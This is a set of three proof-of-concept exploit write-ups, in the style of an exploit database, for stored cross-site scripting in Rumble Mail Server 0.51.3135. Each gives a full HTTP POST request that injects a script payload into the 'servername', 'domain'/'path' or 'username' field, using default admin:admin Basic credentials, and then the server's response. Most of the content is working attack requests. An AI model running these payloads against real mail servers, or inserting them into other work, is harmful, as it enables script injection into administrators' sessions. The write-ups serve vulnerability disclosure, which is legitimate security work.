# Exploit Title: Rumble Mail Server 0.51.3135 - 'servername' Stored XSS # Date: 2020-9-3 # Exploit Author: Mohammed Alshehri # Vendor Homepage: http://rumble.sf.net/ # Software Link: https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe # Version: Version 0.51.3135 # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763 # Exploit: POST /settings:save HTTP/1.1 Host: 127.0.0.1:2580 Connection: keep-alive Content-Length: 343 Cache-Control: max-age=0 Authorization: Basic YWRtaW46YWRtaW4= Upgrade-Insecure-Requests: 1 Origin: http://127.0.0.1:2580 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.57 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://127.0.0.1:2580/settings Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 save=true&runas=root&servername=%3Cscript%3Ealert%28%22xss.com%22%29%3C%2Fscript%3E&forceipv4=1&bindtoaddress=0.0.0.0&messagesizelimit=104857600&mailpath=C%3A%2FProgram+Files%2FRumble%2Fstorage&dbpath=db&radio=sqlite3&smtp=1&smtpport=25&pop3=1&pop3port=110&imap4=1&imap4port=143&deliveryattempts=5&retryinterval=360&Save+settings=Save+settings HTTP/1.1 302 Moved Location: /settings:save HTTP/1.1 200 OK Connection: close Content-Type: text/html RumbleLua
RumbleLua on
Rumble Mail Server v/0.51.3135
Server status Domains & accounts RumbleLua users Server settings Set up modules System logs Mail queue

Server settings

Saving config/rumble.conf

Powered by Rumble Mail Server - [wiki] [project home]

----- # Exploit Title: Rumble Mail Server 0.51.3135 - 'domain and path' Stored XSS # Date: 2020-9-3 # Exploit Author: Mohammed Alshehri # Vendor Homepage: http://rumble.sf.net/ # Software Link: https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe # Version: Version 0.51.3135 # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763 # Info The parameters `domain` and `path` are vulnerable to stored XSS. # Exploit: POST /domains HTTP/1.1 Host: 127.0.0.1:2580 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 119 Origin: http://127.0.0.1:2580 Authorization: Basic YWRtaW46YWRtaW4= Connection: keep-alive Referer: http://127.0.0.1:2580/domains?domain=%3Cscript%3Ealert( Upgrade-Insecure-Requests: 1 domain=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&path=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&create=true HTTP/1.1 200 OK Connection: close Content-Type: text/html RumbleLua
RumbleLua on a
Rumble Mail Server v/0.51.3135
Server status Domains & accounts RumbleLua users Server settings Set up modules System logs Mail queue

Domains

Create a new domain
Domain has been created.
Domain name:
Optional alt. storage path:





 

DomainActions
 "> &delete=true">

Powered by Rumble Mail Server - [wiki] [project home]

----- # Exploit Title: Rumble Mail Server 0.51.3135 - 'username' Stored XSS # Date: 2020-9-3 # Exploit Author: Mohammed Alshehri # Vendor Homepage: http://rumble.sf.net/ # Software Link: https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe # Version: Version 0.51.3135 # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763 # Exploit: POST /users HTTP/1.1 Host: 127.0.0.1:2580 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 96 Origin: http://127.0.0.1:2580 Authorization: Basic YWRtaW46YWRtaW4= Connection: keep-alive Referer: http://127.0.0.1:2580/users Upgrade-Insecure-Requests: 1 username=%3Cscript%3Ealert%28%22M507%22%29%3C%2Fscript%3E&password=admin&rights=*&submit=Submit HTTP/1.1 200 OK Connection: close Content-Type: text/html RumbleLua
RumbleLua on a.com
Rumble Mail Server v/0.51.3135
Server status Domains & accounts RumbleLua users Server settings Set up modules System logs Mail queue

RumbleLua users

This page allows you to create, modify or delete accounts on the RumbleLua system.
Users with lock Full control can add, edit and delete domains as well as change server settings,
while regular users can only see and edit the domains they have access to.

Create a new user:












  

Username Rights Actions
  Full control &edit=true">  &delete=true">
 admin Full control  
  Full control &edit=true">  &delete=true">

 


Powered by Rumble Mail Server - [wiki] [project home]